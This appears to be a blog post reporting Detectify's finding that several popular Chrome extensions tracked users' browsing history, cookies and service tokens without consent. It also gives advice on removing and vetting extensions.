So what’s going on? briefly, if you use Google Chrome as your main browser and extend its functionality with some of its many available extensions then you might be susceptible to behavioral tracking.
The Detectify Team, a Swedish based company, identified and observed the questionable behavior of multiple well known and top Google Chrome Web Extensions which tracks the users browser history, cookies, and other secret token related to well known service providers such as Facebook and Dropbox.
These web extensions like HooverZoom, Instant Translate, FB Color Changer, SuperBlock AdBlocker and more (Note that Seven (7) of the 12 listed extensions were disabled from the web store according to their latest update), have this tracking behavior enabled by default and is practiced without getting the user consent which is considered questionable and illegal. Such tracking behavior is in some cases provided by an external library which is used by the original author of the extension, which in that case is performed possibly even without the author knowledge.
In addition to that, according to the researchers, the tracking services which performs the tracking and behavioral analytic, have an auto-update feature which is separate in its design from the main extension update process. Not only that, those processes can run in a separate background process from the main extension process which allows it to keep running its sneaky tracking objectives behind the scenes. This means that such tracking services can check for and update its mechanism and code without the user updating the main extension, hence the analytic providers can push updates and update their small sneaky software tracking behavior.
It’s not the first time that we talk about our digital privacy, information security and information tracking. The threat of losing our online privacy reached critical levels, where we are intentionally and unintentionally releasing some of our private information to some third party, and the most fearful part is that some of our private information is being stolen from us in legitimized and uncontrolled way.
What can we do?
Well the detectify team recommended the users to uninstall all the extensions from their browser as an initial phase, then before installing any extension, let’s go through the details of that extension and read it thoroughly to see if they mention anything of the sort (gathering info or accessing your links, cookies, etc…), yet they also stated that some of those details are rephrased in a way that makes it hard to identify their real intentions behind it.
Moreover, a lot of responsibility now relies on the Google Chrome team which should restrict the extensions to access the browser cookies and user’s sensitive information, as a start.
If you still need to use some extensions which are flagged for such behavior, the team recommends using it in Chrome’s incognito mode.
For more details please refer to the original blog post “Chrome Extensions – AKA Total Absence of Privacy”
Update 1: The detectify team updated their finding saying that now 8 of the 12 Chrome extensions were removed from the Web Store for braking the store policy and the remaining extensions removed the tracking scripts.